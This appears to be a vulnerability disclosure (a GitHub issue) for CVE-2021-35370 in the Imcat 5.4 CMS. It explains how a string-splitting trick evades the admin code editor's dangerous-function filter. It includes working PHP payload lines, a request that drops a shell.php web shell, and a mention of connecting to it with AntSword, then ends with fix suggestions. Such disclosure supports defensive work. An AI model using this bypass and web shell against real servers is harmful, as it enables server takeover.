Headline
CVE-2021-35370: Code Execution Vulnerability in the background of imcat5.4 · Issue #8 · peacexie/imcat
An issue found in Peacexie Imcat v5.4 allows attackers to execute arbitrary code via the incomplete filtering function.
1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: Code Execution
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur
2. Source code analysis
In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability
3. Reappearance
Use phpstudy to build the environment, and then log in to the background of the website
(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here
(2) Try to write a sentence
Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered
(3) Try to write
$ch = explode(“.","hello.ass.world.er.t”);
$c = $ch[1].$ch[3].$ch[4]; //assert
$d=$_GET[‘x’];
$c($d);
Successfully bypassed
(4) Visit
http://127.0.0.1/imcat/index.php?x= fputs(fopen(‘shell.php’,’w’),’’)
This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse
Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory
(5) Use ant sword to connect
http://127.0.0.1/imcat/shell.php
4. Repair service suggestions
(1) Turn off the function of modifying the source code in the background
(2) Perfect the rules of detection (this is hard to implement)